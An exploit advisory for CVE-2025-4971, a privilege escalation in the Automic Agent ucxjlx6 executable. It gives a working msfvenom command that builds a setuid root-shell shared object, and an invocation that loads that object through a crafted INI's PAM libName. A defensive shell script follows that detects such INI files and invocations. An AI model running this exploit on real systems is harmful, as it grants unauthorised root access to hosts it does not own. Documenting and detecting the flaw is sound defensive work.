# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom

$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows

$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
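
The steps above depend on two things a defender can check: the INI file handed to ucxjlx6 through `ini=`, and the library path in its `[PAM]` `libName` key. The following audit sketch is an added example, not part of the original advisory or of the vendor's tooling; the function names, the list of scratch directories and the `/opt/agent` path are assumptions made for illustration.

```shell
#!/bin/sh
# Added defensive example (not from the advisory). Function names, the sample
# INI and the sample command lines are constructed for illustration.

# Print the libName value from the [PAM] section of an agent INI file.
# Assumption: section and key names are matched case-insensitively.
pam_libname() {
  awk '
    /^[ \t]*\[/ { in_pam = (toupper($0) ~ /^[ \t]*\[PAM\]/); next }
    in_pam {
      eq = index($0, "=")
      if (eq == 0) next
      key = substr($0, 1, eq - 1); val = substr($0, eq + 1)
      gsub(/^[ \t]+|[ \t]+$/, "", key)
      gsub(/^[ \t]+|[ \t]+$/, "", val)
      if (tolower(key) == "libname") { print val; exit }
    }' "$1"
}

# Succeed (exit 0) when the library path should not be trusted: missing,
# not owned by root, or writable by group or other.
lib_untrusted() {
  [ -e "$1" ] || return 0
  [ -n "$(find -L "$1" -prune \( ! -user root -o -perm -020 -o -perm -002 \) -print)" ]
}

# Succeed (exit 0) when a recorded command line starts ucxjlx6 with an INI
# taken from a file descriptor (process substitution) or a scratch directory.
suspicious_cmdline() {
  case "$1" in
    *ucxjlx6*" ini=/dev/fd/"* | *ucxjlx6*" ini=/proc/"*"/fd/"* | \
    *ucxjlx6*" ini=/tmp/"* | *ucxjlx6*" ini=/var/tmp/"* | \
    *ucxjlx6*" ini=/dev/shm/"*) return 0 ;;
  esac
  return 1
}

# Demo on constructed input: an INI shaped like the one in step 2 and two
# constructed command lines (the /opt/agent path is a placeholder).
demo() {
  ini=$(mktemp)
  printf '[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n' > "$ini"
  lib=$(pam_libname "$ini"); rm -f "$ini"
  lib_untrusted "$lib" && echo "untrusted PAM library: $lib"
  for c in "./ucxjlx6 ini=/dev/fd/63" "./ucxjlx6 ini=/opt/agent/ucxjlx6.ini"; do
    suspicious_cmdline "$c" && echo "suspicious invocation: $c"
  done
  return 0
}
demo
```

`suspicious_cmdline` is meant to be fed command lines from process-execution logs; `pam_libname` and `lib_untrusted` apply to the agent INI files present on a host.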